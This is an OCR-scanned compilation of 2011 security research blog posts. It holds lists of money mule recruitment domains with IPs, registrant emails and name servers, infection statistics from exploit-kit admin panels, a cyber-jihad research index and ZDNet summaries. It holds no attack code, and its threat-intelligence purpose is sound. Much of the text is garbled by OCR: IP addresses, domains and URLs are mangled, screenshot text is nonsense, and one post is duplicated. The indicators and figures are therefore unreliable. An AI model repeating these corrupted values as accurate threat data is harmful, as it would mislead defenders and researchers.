SCAR-BEIINC.COM - 184.168.64.173 - Email: admin@scar-beiinc.com 
SKYLINE-ANTIQUE.COM - 209.190.4.91 - Email: blurs@mailae.com 
SKYLINE-LTD.NET - 209.190.4.91 - Email: admin@skyline-Itd.net 
SMARTLLC-UK.COM - 193.105.134.234 - Email: admin@smartllc-uk.com 
SMART-LLC-UK.NET - 193.105.134.233 - Email: pol@mailae.com 
SPECIAL-ARTUK.COM - 193.105.134.232 - Email: admin@special-artuk.com 
SUBLIMELTD.COM - 98.141.220.118 - Email: admin@sublimeltd.com 


TODEX-GROUP.NET - 184.168.64.173 - Email: admin@todex-group.net 
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guad-groupuk. cc 


The domains reside within the following ASs: AS10297, RoadRunner RR-RC; AS42708; 


PORTLANE Network; AS26496; GODADDY.com; AS29713, INTERPLEXINC; AS24940, HETZNER- 
AS Hetzner Online. 


Name servers of notice: 


NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 


NS2.MKNS.SU - 46.4.148.119 
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NS3.MKNS.SU - 184.82.158.76 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 
NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: mnamed@yourisp.ru 
NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 
NS2.DNSUS.SU - 87.118.81.7 

NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: lavier@bz3.ru 
NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free-id.ru 
NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

NS1.NAMESUKNS.CC - 86.55.210.4 - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC - 193.105.134.232 

NS3.NAMESUKNS.CC - 193.105.134.237 

NS1.NAMEUK.AT - 86.55.210.5 - Email: admin@nameuk.at 
NS2.NAMEUK.AT - 193.105.134.233 

NS3.NAMEUK.AT - 193.105.134.236 

NS1.UKDNSTART.NET - 86.55.210.5 - Email: admin@ukdnstart.net 
NS2.UKDNSTART.NET - 193.105.134.233 


NS3.UKDNSTART.NET - 193.105.134.236 
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NS1.DENDRUYOS.NET - 86.55.210.4 - Email: admin@dendruyos.net 
NS2.DENDRUYOS.NET - 193.105.134.232 

NS3.DENDRUYOS.NET - 193.105.134.237 

NS1.DEDNSAUTH.NET - 86.55.210.2 - Email: admin@dednsauth.net 
NS2.DEDNSAUTH.NET - 193.105.134.230 

NS3.DEDNSAUTH.NET - 193.105.134.239 

NS1.DELTOPOOR.AT - 86.55.210.3 - Email: admin@deltopoor.at 
NS2.DELTOPOOR.AT - 193.105.134.231 


NS3.DELTOPOOR.AT - 193.105.134.238 


Monitoring of ongoing money mule recruitment campaigns is ongoing. 


Related posts: 

[2]Keeping Money Mule Recruiters on a Short Leash - Part Nine 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[4]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[7]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[8]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[9]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[10]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[11]Money Mule Recruiters on Yahoo!’s Web Hosting 

[12]Dissecting an Ongoing Money Mule Recruitment Campaign 


[13]Keeping Money Mule Recruiters on a Short Leash - Part Two 
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[14]Keeping Reshipping Mule Recruiters on a Short Leash 
[15]Keeping Money Mule Recruiters on a Short Leash 
[16]Standardizing the Money Mule Recruitment Process 
[17]Inside a Money Laundering Group’s Spamming Operations 
[18]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


[19]Money Mules Syndicate Actively Recruiting Since 2002 
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7.8 August 


Zero Day 


Home Neus & Blog: 
ZDNet Must Reed 


Did Adobe hide 400 Flash Player vulnerability fixes? 


7.8.1 Summarizing ZDNet’s Zero Day Posts for July (2011-08-22 18:06) 
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The following is a brief summary of all of my posts at ZDNet’s Zero Day for July. You can 
subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


x 


01.[3]’Leaked Video of Casey Anthony CONFESSING to Lawyer!’ scam spreading on Facebook 
02. [4]Anonymous leaks 90,000+ emails from compromised military contractor Booz Allen 
Hamilton 

03. [5]’This girl must be Out of her Mind to do this on live Television!’ scam spreading on 
Facebook 

04. [6]Spamvertised bank statements serving scareware 

05. [7]lInternet Explorer 9 outperforms competing browsers in malware blocking test 
06.[8]’Leaked Video! Amy Winehouse on Crack hours before death’ scam spreading on 
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Facebook 

07.[9]Pfizer’s Facebook hacked by AntiSec 

08. [10]90,000+ pages compromised in mass iFrame injection attack 

09. [11]Amazon’s cloud services systematically exploited by cybercriminals 


This post has been reproduced from [12]Dancho Danchev’s blog. Follow him 
[13]Jon Twitter. 
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7.8.2 A Peek Inside Web Malware Exploitation Kits (2011-08-29 13:19) 


With web malware exploitation kits, continuing to represent the attack method of choice for 
the majority of cybercriminals thanks to the [1loverall susceptibility of end and [2]enterprise 
users to client-side exploitation attacks, it’s always worth taking a peek inside them from the 
perspective of the malicious attacker. 


In this post, we’ll take a peek inside three web malware exploitation kits, and discuss 
what makes them think in terms of infected OSs, browser plugins and client-side exploits. 


_Dragon Pack Web Malware Exploitation Kit 


[3] 
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IFrame Statistics Countries Referer 


STATISTICS 
— NICS WINDOWS LORDS PERCENT 
583 486 45 9.26% 
Se SS eS See 
JAVAROX 42 93.33 
JAVASMB 2 4.44 
MDAC : 2.22 
BROWSER WISTS. LORDS RATE 
MSIE 6 6 1 16.67% 
MSIE 7 3 6.12% 
MSIE 8 187 13 6.95% 
Chrome 65 7 10.77% 
Firefox 209 20 9.57% 
Opera 6 0 0% 
Safari 57 Lt) 0% 
Other 6 0 0% 
SS SS a ee eee 
Windows 95 1 1 100% 
Windows 2000 1 0 0% 
Windows XP 175 14 8% 
Windows XP SP2 22 3 13.64% 
Windows Viste 146 12 8.22% 
Windows 7 141 i5 10.64% 


What we've got here is a rather modest in terms of activity, web malware exploitation kit admin 
panel. We’ve got 45 successful loads based on 588 unique visits, with the JavaRox exploit 
executed 42 times, successfully infecting 20 Firefox users. The exploits have successfully 
loaded on Windows XP 14 times, on Windows XP SP2 3 times, on Windows Vista 12 times, and 
on Windows 7 15 times. 


_Dragon Exploit Pack 
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The Dragon Exploit Pack has 45 successful loads based on 587 unique visitors, with the JavaJDK 
exploit executed successfully 42 times. The kit is counting 13 successful loads on MSIE 8, and 
another 20 on Firefox, with 14 successful loads recorded for Windows XP, 2 on Windows XP 
SP2, 12 on Windows Vista and 15 on Windows 7. 


_Katrin Exploit Pack 
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Java SM 535 16.33% 

Java SMB 576 17.58% 

Java OBE 914 27.89% 

Old 4 PDF 87 2.65% 

Libtiff PDF 726 22.15% 

MDAC 96 2.93% 
Snapshot 104 3.17% 

HOP 239 7.29% 

MSIE 6 1315 452 34.37% 
MSIE 7 2408 786 32.64% 
MSIE 8 $162 1198 14.68% 
MSIE 9 89 6 6.74% 
Chrome 2559 274 10.71% 
Firefox +499 522 11.6% 
Opera 209 24 11.48% 
Safari 542 14 2.58% 
Other 150 1 0.67% 
Windows 98 23 7 30.43% 
Windows 2000 38 9 23.68% 
Windows 2003 33 7 21.21% 
Windows XP 10648 2107 19.79% 
Windows Vista 2724 625 22.94% 
Windows 7 5451 503 9.23% 
Other OS 1016 19 1.87% 


The Katrin Exploit Pack has 3277 successful loads based on 19933 unique visits, which 
represents a 17.32 % infection rate. The Java JSM exploit has been successfully loaded 535 
times, Java SMB has been loaded 576 times, Java OBE has been loaded 914 times, Old 4 PDF 
has been loaded 87 times, Libtiff PDF has been loaded 726 times, MDAC has been loaded 96 
times, Snapshot has been loaded 104 times, and HCP has been loaded 239 times. 


The kit is counting 452 successful exploitation attempts against MSIE 5, 786 against 
MSIE7, 1198 against MSIE 8, 274 against Chrome, 522 against Firefox, 24 against Opera 
and 14 against Safari. The majority of loads have affected Windows XP installations, with 
2107 successful loads targeting the OS, following 625 on Windows Vista, and 503 on Windows 7. 


_Liberty Exploit Pack 
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Browser Uniques Downloads Percent 


Total (100 %) 3029 sss 18.32 % 

IE 6 (37.07 %) 1123 397 35.35 % (13.11 %) 
1E 7 (30.57 %) 926 oP 9.61 % (2.4% %) 
Forefox (26.64 %) 504 10.71 % (1.78 %) 
Unknown (11.69 %) 360 2 0.56 % (0.07 %) 
Chrome (2.01 %) 61 ° 14,75 % (0.3 %) 
Opera (1.02 %) $s a 7.27 % (0.13 %) 


The Liberty Exploit pack screenshot, is showing the proportion successfully infected web 
browsers, with total of 555 successful loads based on 3029 unique visitors. 397 loads have 
affected Internet Explorer 6, 89 Internet Explorer 7, and 54 Firefox. 


_Bleeding Life Exploit Pack 
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Statistcs 


In this Bleeding Life web malware exploitation kit, we can clearly seen the dynamics behind 
the infections taking place. We see 554 successful loads based on 4106 unique visitors. 
JavaSignedApplet has been executed 161 times, Adobe-90-2010-0188 has been executed 67 
times, Adobe-80-2010-0188 has been executed 46 times, Java-2010-0842 has been executed 
203 times, Adobe-2008-2992 has been executed 74 times, and Adobe-2010-1297 has been 
executed 2 times. 


The majority of the infected population is based in the U.S, United Kingdom, Qatar, and 
Malaysia. Windows XP has the highest market share of infected OSs, with 336 successful loads 
based on 2098 unique visitors. Followed by Windows 7 with 139 loads based on 1256 unique 
visitors, and 73 unique loads based on 719 unique visitors for Windows Vista. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him 
[5Jon Twitter. 


3788 


. bttp://www.zdnet.com/blog/security/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/9 


ttp://www.zdnet.com/blog/security/kaspersky- 12-different-vulnerabilities-detected-on-every-pc/928 
3. http://2.bp. blogspot .com/-bmN4062dMmw/T1th60Y7FSI/AAAAAAAAE6U/Z1FYkeRzp5g/s1600/31372543. jpg 
4. http://ddanchev. blogspot. com/ 


5. http://twitter.com/danchodanche 


7.8.3 Keeping Money Mule Recruiters on a Short Leash - Part Eleven (2011-08-29 15:51) 
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The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a Short 
Leash series. In it, I'll expose currently active money mule recruitment domains, their domain 
registration details, currently responding IPs, and related ASs. 


Money mule recruitment domains: 
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fabia-art.com 


fine-artgroup.com 


ltd-scg.net 
gmd-contracting.com 
techce-group.com 
triad-webs.com 
ACWOODE-GROUP.COM 
ACWOODE-GROUP.NET 
ART-GAPSON.COM 
ELENTY-LLC.COM 
GAPSONART.NET 
GURU-GROUP.CC 
GURU-GROUP.NET 
INTECHTODEX-GROUP.COM 
NARTEN-ART.COM 
NARTENART.NET 
panart-lic.com 
REFINEMENT-ANTIQUE.COM 
REFINEMENTUK-LTD.NE 
SKYLINE-ANTIQUE.COM 
SKYLINE-LTD.NET 
TODEX-GROUP.NET 


209.190.4.91 
209.190.4.91 
209.190.4.91 
194,242.2.56 
184.168.64.173 
85.17.24.226 
78.46.105.205 
78,.46.105.205 
78.46.105.205 
78,46.105.205 
78.46.105.205 
78,46.105.205 
78.46.105.205 
78,46.105.205 
78.46.105.205 
78,46.105.205 
78.46.105.205 
78,46,.105.205 
78,.46.105.205 
78.46.105.205 
78.46.105.205 
78,.46.105.205 


CONDOR-LLC-UK.NET 
CONDORLLC-UK.COM 
DE-DVFGROUP.BE 
ELENTY-CO.NET 


ACWOODE-GROUP.COM - 78.46.105.205 - Email: admin@acwoode-group.com 
ACWOODE-GROUPR.NET - 78.46.105.205 - Email: admin@acwoode-group.net 
ART-GAPSON.COM - 78.46.105.205 - Email: admin@art-gapson.com 
CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net 
CONDORLLC-UK.COM - Email: plods@fxmail.net 

DE-DVFGROUP.BE 

ELENTY-CO.NET - Email: abcs@mailti.com 

ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty-llc.com 
fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org 
fine-artgroup.com - 209.190.4.91 

GAPSONART.NET - 78.46.105.205 - Email: admin@gapsonart.net 
gmd-contracting.com - 194.242.2.56 - Email: admin@gmd-contracting.com 
GURU-GROUP.CC - 78.46.105.205 - Email: admin@guru-group.cc 
GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org 
INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: ug@mail13.com 
Itd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com 

NARTEN-ART.COM - 78.46.105.205 - Email: glamor@fxmail.net 
NARTENART.NET - 78.46.105.205 - Email: admin@nartenart.net 
panart-lic.com - 78.46.105.205 - Email: admin@panart-llc.com 
REFINEMENT-ANTIQUE.COM - 78.46.105.205 - Email: xe@fxmail.net 
REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: admin@refinementuk-ltd.net 
SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: blurs@mailae.com 
SKYLINE-LTD.NET - 78.46.105.205 - Email: admin@skyline-Itd.net 
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techce-group.com - 184.168.64.173 - Email: admin@techce-group.com 
TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex-group.net 
triad-webs.com - 85.17.24.226 


The domains reside within the following ASs: AS24940, HETZNER-AS Hetzner Online AG RZ; 
AS16265, LeaseWeb B.V. Amsterdam; AS26496, GODADDY .com, Inc.; AS10297, RoadRunner 
RR-RC-Enet-Columbus. 
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5b.4.be.staticxlhostcom 


PTR 


fabia-art.com 
fabia-artnet 
tabiaart-ltd.com 
fabiaart-usa.com 
line-artgroup.com 
fineart-group.com 


flash-uk-llc.com 
A Aa 


4 35 
guru-co.net A 3 209.190.4.91 NET 209.190.0.0/17 | 
=——. 
Aa 


mx fabia-artnet 
mx. fabiaart-usa.com 
mxftine-artgroup.com 
mx fineart-group.com 

mx.guru-co.net 

panartiic.net 
skyline-antique.com 


skyline-itd.net 


Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 
NS2.MKNS.SU - 46.4.148.119 

NS3.MKNS.SU - 184.82.158.76 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: mnamed@yourisp.ru 
NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 
NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.NAMESUKNS.CC - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC 

NS3.NAMESUKNS.CC 
NS1.NAMEUK.AT - Email: admin@nameuk.at 
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AS10297 


NS2.NAMEUK.AT 

NS3.NAMEUK.AT 

NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne 
NS2.UKDNSTART.NET 

NS3.UKDNSTART.NET 


Monitoring of ongoing money mule recruitment campaigns is ongoing. 


Related posts: 

[2]Keeping Money Mule Recruiters on a Short Leash - Part Ten 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Nine 
[4]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[7]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[8]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[9]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[10]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[12]Money Mule Recruiters on Yahoo!’s Web Hosting 

[13]Dissecting an Ongoing Money Mule Recruitment Campaign 
[14]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[15]Keeping Reshipping Mule Recruiters on a Short Leash 
[16]Keeping Money Mule Recruiters on a Short Leash 
[17]Standardizing the Money Mule Recruitment Process 

[18]Inside a Money Laundering Group’s Spamming Operations 
[19]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[20]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [21]Dancho Danchev’s blog. 
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ttp://ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.htm 


. http: //ddanchev.blogspot .com/2011/05/keeping-money-mule-recruiters-on-short .htm 


| http://adanchey blogspot. con/2011/08/keeping-noney-mule-recruiters~on-short html 
_hetp://adanchov blogspot .con/2014/01/keeping-noney-mile-recruiters~on~short. heal 

_ http: //adanchev blogspot. con/2010/04/dne~infrastructure~of-noney-mule. heal 
_http://adanchey blogspot. con/2010/04/keeping-noney-mule~recruiters-on-short tal 
10, firtp;//adanchev. blogspot .con/2010/08/aoney-mule~recrutnent~canpaign-serving. ntl 
11. ttp://ddanchev. blogspot con/7010/08/keoping-noney-mile-recruiters-on-short. nia 


. http://ddanchev. blogspot .com/2010/03/money-mule-recruiters-on-yahoos-web.htm 
13. http://ddanchev. blogspot .com/2010/02/dissect ing-ongoing-money-mule .htm 
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ttp://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 
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17. http://ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .htm 
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21. http://ddanchev.blogspot.com/ 


7.8.4 Keeping Money Mule Recruiters on a Short Leash - Part Eleven (2011-08-29 15:51) 


Fineart Group LLC 


USPS 


tests for proposal 
's for the best price 
iques! 


= What We Do y ? Services Overview Fr] About us 


The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a 
Short Leash series. 


In it, l’ll expose currently active money mule recruitment domains, 


their domain registration details, currently responding IPs, and related 
ASs. 


Money mule recruitment domains: 
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fabia-art.com 


fine-artgroup.com 


ltd-scg.net 
gmd-contracting.com 
techce-group.com 
triad-webs.com 
ACWOODE-GROUP.COM 
ACWOODE-GROUP.NET 
ART-GAPSON.COM 
ELENTY-LLC.COM 
GAPSONART.NET 
GURU-GROUP.CC 
GURU-GROUP.NET 
INTECHTODEX-GROUP.COM 
NARTEN-ART.COM 
NARTENART.NET 
panart-lic.com 
REFINEMENT-ANTIQUE.COM 
REFINEMENTUK-LTD.NE 
SKYLINE-ANTIQUE.COM 
SKYLINE-LTD.NET 
TODEX-GROUP.NET 
CONDOR-LLC-UK.NET 
CONDORLLC-UK.COM 
DE-DVFGROUP.BE 
ELENTY-CO.NET 


209.190.4.91 
209.190.4.91 
209.190.4.91 
194,242.2.56 
184,168.64.173 
85.17.24.226 
78.46.105.205 
78,46.105.205 
78.46.105.205 
78,.46.105.205 
78,.46.105.205 
78,.46,.105.205 
78.46.105.205 
78,46,.105.205 
78,.46.105.205 
78.46.105.205 
78.46.105.205 
78,.46.105.205 
78,.46.105.205 
78.46.105.205 
78.46.105.205 
78,.46.105.205 


ACWOODE-GROUP.COM - 78.46.105.205 - Email: admin@acwoode-group.com 
ACWOODE-GROUP.NET - 78.46.105.205 - Email: admin@acwoode-group.net 
ART-GAPSON.COM - 78.46.105.205 - Email: admin@art-gapson.com 
CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net 
CONDORLLC-UK.COM - Email: plods@fxmail.net 

DE-DVFGROUP.BE 

ELENTY-CO.NET - Email: abcs@mailti.com 

ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty-llc.com 
fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org 


fine-artgroup.com - 209.190.4.91 
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GAPSONART.NET - 78.46.105.205 - Email: admin@gapsonart.net 
gmd-contracting.com - 194.242.2.56 - Email: admin@gmd-contracting.com 
GURU-GROUP.CC - 78.46.105.205 - Email: admin@guru-group.cc 
GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org 
INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: uq@mail13.com 
Itd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com 

NARTEN-ART.COM - 78.46.105.205 - Email: glamor@fxmail.net 
NARTENART.NET - 78.46.105.205 - Email: admin@nartenart.net 
panart-Ilc.com - 78.46.105.205 - Email: admin@panart-llc.com 
REFINEMENT-ANTIQUE.COM - 78.46.105.205 - Email: xe@fxmail.net 
REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: admin@refinementuk-lItd.net 
SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: blurs@mailae.com 
SKYLINE-LTD.NET - 78.46.105.205 - Email: admin@skyline-Itd.net 
techce-group.com - 184.168.64.173 - Email: admin@techce-group.com 
TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex-group.net 


triad-webs.com - 85.17.24.226 
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The domains reside within the following ASs: AS24940, HETZNER-AS Hetzner Online AG RZ; 
AS16265, LeaseWeb B.V. Amsterdam; AS26496, GODADDY .com, Inc.; AS10297, RoadRunner 
RR-RC-Enet-Columbus. 
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5b.4.be.staticxlhostcom 


PTR 
fabia-art.com 
tabia-artnet 
fabiaart-ltd.com 
fabiaart-usa.com 
fine-artgroup.com 
fineart-group.com 
flash-uk-llc.com 
s A AMG 
/~ — ao: 
guru-co.net 4 a 209.190.4.91 NET 209.190.0.0/17 
Ss 
oy 


mx.fabia-artnet 
mx.fabiaart-usa.com 
mxtine-artgroup.com 
mxtineart-group.com 
mx.guru-co.net 
panartiic.net 
skyline-antique.com 


skyline-itd.net 


Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 
NS2.MKNS.SU - 46.4.148.119 

NS3.MKNS.SU - 184.82.158.76 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: mnamed@yourisp.ru 


NS2.MNAMEDL.SU - 46.4.148.118 
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AS 


AS10297 


NS3.MNAMEDL.SU - 184.82.158.75 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 
NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 
NS1.NAMESUKNS.CC - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC 

NS3.NAMESUKNS.CC 

NS1.NAMEUK.AT - Email: admin@nameuk.at 
NS2.NAMEUK.AT 

NS3.NAMEUK.AT 

NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne 
NS2.UKDNSTART.NET 


NS3.UKDNSTART.NET 


Monitoring of ongoing money mule recruitment campaigns is ongoing. 


Related posts: 

[2]Keeping Money Mule Recruiters on a Short Leash - Part Ten 

[3]Keeping Money Mule Recruiters on a Short Leash - Part Nine 

[4]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Seven 

[6]Keeping Money Mule Recruiters on a Short Leash - Part Six 

[7]Keeping Money Mule Recruiters on a Short Leash - Part Five 


[8]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
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[1 
[1 
[1 
[1 
[1 
[1 
[1 
[1 
[1 
[1 


[2 


]Keeping Money Mule Recruiters on a Short Leash - Part Four 
0]Money Mule Recruitment Campaign Serving Client-Side Exploits 
1]Keeping Money Mule Recruiters on a Short Leash - Part Three 
2]Money Mule Recruiters on Yahoo!’s Web Hosting 

3]Dissecting an Ongoing Money Mule Recruitment Campaign 
4]Keeping Money Mule Recruiters on a Short Leash - Part Two 
5]Keeping Reshipping Mule Recruiters on a Short Leash 
6]Keeping Money Mule Recruiters on a Short Leash 
7|Standardizing the Money Mule Recruitment Process 

8]lnside a Money Laundering Group’s Spamming Operations 
9]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


0]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [21]Dancho Danchev’s blog. 
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7.9 September 


7.9.1 Summarizing 3 Years of Research Into Cyber Jihad (2011-09-11 13:34) 


On this very special day, I’d like to honor the fallen by summarizing my research into cyber 
jihad, a topic I’m still highly passionate about. Enjoy and share it with your social circle! 


Le 
2 
3 
4 
3: 
6 
7 
8 
9 


10. 
11. 
i7, 
13. 
14. 
15. 
16. 
17. 
18. 
19. 
20. 
21. 
22. 


[1]Tracking Down Internet Terrorist Propaganda 


. [2]Arabic Extremist Group Forum Messages’ Characteristics 
. [3]Cyber Terrorism Communications and Propaganda 


. [4]A Cost-Benefit Analysis of Cyber Terrorism 


[5]Current State of Internet Jihad 


. [6]Analysis of the Technical Mujahid - Issue One 
. [7]Full List of Hezbollah’s Internet Sites 
. [8]Steganography and Cyber Terrorism Communications 


. [9]Hezbollah’s DNS Service Providers from 1998 to 2006 


[10]Mujahideen Secrets Encryption Tool 
[11]Analyses of Cyber Jihadist Forums and Blogs 
[12]Cyber Traps for Wannabe Jihadists 
[13]Inshallahshaheed - Come Out, Come Out Wherever You Are 
[14]GIMF Switching Blogs 

[15]GIMF Now Permanently Shut Down 

[16]GIMF - "We Will Remain" 

[17]Wisdom of the Anti Cyber Jihadist Crowd 
[18]Cyber Jihadist Blogs Switching Locations Again 
[19]Electronic Jihad v3.0 - What Cyber Jihad Isn’t 
[20]Electronic Jihad’s Targets List 

[21]Teaching Cyber Jihadists How to Hack 


[22]A Botnet of Infected Terrorists? 
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23. [23]Infecting Terrorist Suspects with Malware 

24. [24]The Dark Web and Cyber Jihad 

25. [25]Cyber Jihadist Hacking Teams 

26. [26]Two Cyber Jihadist Blogs Now Offline 

27. [27]Characteristics of Islamist Websites 

28. [28]Cyber Traps for Wannabe Jihadists 

29. [29]Mujahideen Secrets Encryption Tool 

30. [30]An Analysis of the Technical Mujahid - Issue Two 
31. [31]Terrorist Groups’ Brand Identities 

32. [32]A List of Terrorists’ Blogs 

33. [33]Jihadists’ Anonymous Internet Surfing Preferences 
34. [34]Sampling Jihadists’ IPs 

35. [35]Cyber Jihadists’ and TOR 

36. [36]A Cyber Jihadist DoS Tool 

37. [37]GIMF Now Permanently Shut Down 

38. [38]Mujahideen Secrets 2 Encryption Tool Released 


39. [39]Terror on the Internet - Conflict of Interest 


This post has been reproduced from [40]Dancho Danchev’s blog. Follow him [41]Jon 
Twitter. 
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. http: //ddanchev.blogspot.com/2007/11/cyber- jihadist-blogs-switching. htm 
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ttp://ddanchev. blogspot .com/2007/11/electronic- jihad-v30-what-cyber- jihad. htm 


20. http: //ddanchev. blogspot .com/2007/11/electronic- jihads-targets-list .htm 


ttp://ddanchev. blogspot .com/2007/11/teaching-cyber-jihadists-how-to-hack.htm 


22. 

23, 
24. 

25. 


ttp://ddanchev. blogspot .com/2007/09/two-cyber- jihadist-blogs-now-offline.htm 


ttp://ddanchev. blogspot .com/2007/02/characteristics-of-islamist-websites.htm 
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31. http://ddanchev.blogspot .com/2007/07/terrorist-groups-brand-identities.htm 
32. http://ddanchev. blogspot .com/2007/06/list-of-terrorists-blogs.htm 


ttp://ddanchev. blogspot .com/2007/05/jihadists-anonymous-internet- surfing. htm 


34. http://ddanchev. blogspot .com/2007/05/sampling- jihadists-ips.htm 


. http://ddanchev. blogspot .com/2007/07/cyber- jihadists-and-tor.htm 
36. http://ddanchev.blogspot .com/2007/08/cyber- jihadist-dos-tool.htm 
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ttp://ddanchev. blogspot .com/2008/01/mujahideen-secrets-2-encryption-tool.htm 
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40. http://ddanchev.blogspot.com/ 
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7.9.2 Summarizing ZDNet’s Zero Day Posts for August (2011-09-27 19:13) 


Zero Day “enna (nt) MUFCEDECKT 


ANSTALLVERPOKERT 


Home News & Blogs 
ZDNet Must Read l 
Firefox 6 patches 10 dangerous security holes 
Voe iPhone Uber Windows Motde be Anctrost 
‘ 


The vulnerabdities are seriou gh to allow an attacker to launch harmful code and instal Moratinch athe HarePy. Troms a 30 Mara ten! onter 40 


tteracbon beyond moemal brow sing Sear torone Podoast bei CHET > 


Russian Embassy in London hit by a DDoS attack 
The best of ZDNet, delivered 
The Russian embassy 1 was het by a destrfated derual of 


Ke attack (DD0S) 0 


New ransomware variant uses false child porn 
accusations 


ware variaek @ ZDNet's White Paper Membership 
Newsletter: Stay Curent with ste news 
end vodetes from Wwiete Papers 


"Man in wheelchair falls down the elevator shaft’ @ ZDNet's Must-Read News Alerts: 
: Breaking IT news as « happens 
scam spreading on Facebook 


Researchers from Sophos have spotted a currently arowdatin: 
Mn, APRKING visitors into chiang on a Bogus video knk 


a ™. Be a fan on Facebook 
MS Patch Tuesday warning: Opening 


legitimate .doc, .txt files brings code execution psoas aateenbanlakven'eg! 


Wareh us on YouTube 
Download cer Android epp 
Download cer iPhone app 


Ghost in the Wires: The Kevin Mitnick Interview 


ses his new book, his expats 
hos 2 Wires 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for August. You can 
subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


O01. [3]Study: Rootkits target pirated copies of Windows XP 

02. [4]56 percent of enterprise users using vulnerable Adobe Reader plugins 

03. [5]New malware attack circulating on Facebook 

04. [6]Kaspersky: 12 different vulnerabilities detected on every PC 

05. [7]Spamvertised Uniform traffic tickets and invoices lead to malware 

06. [8]Latest version of Skype susceptible to malicious code injection flaw 

07. [9]Spamvertised ’Scan from a Xerox WorkCentre Pro’ leads to malware 

08. [10]Malware Watch: FDIC and Western Union themed emails lead to malware 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 
[12]Jon Twitter. 
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1. http://www.zdnet .com/topics/danchotdanchev?0=1émode=rssktag=mantle_skin; content 


2. http://feeds.feedburner.com/zdnet/securit 


ttp://www.zdnet.com/blog/security/study-rootkits-target-pirated-copies-of-windows-xp/922 


ttp://www.zdnet .com/blog/security/56-percent- of-enterprise-users-using-vulnerable-adobe-reader-plugins/9 


5. http: //www.zdnet .com/blog/security/new-malware-attack-circulating-on-facebook/9281 


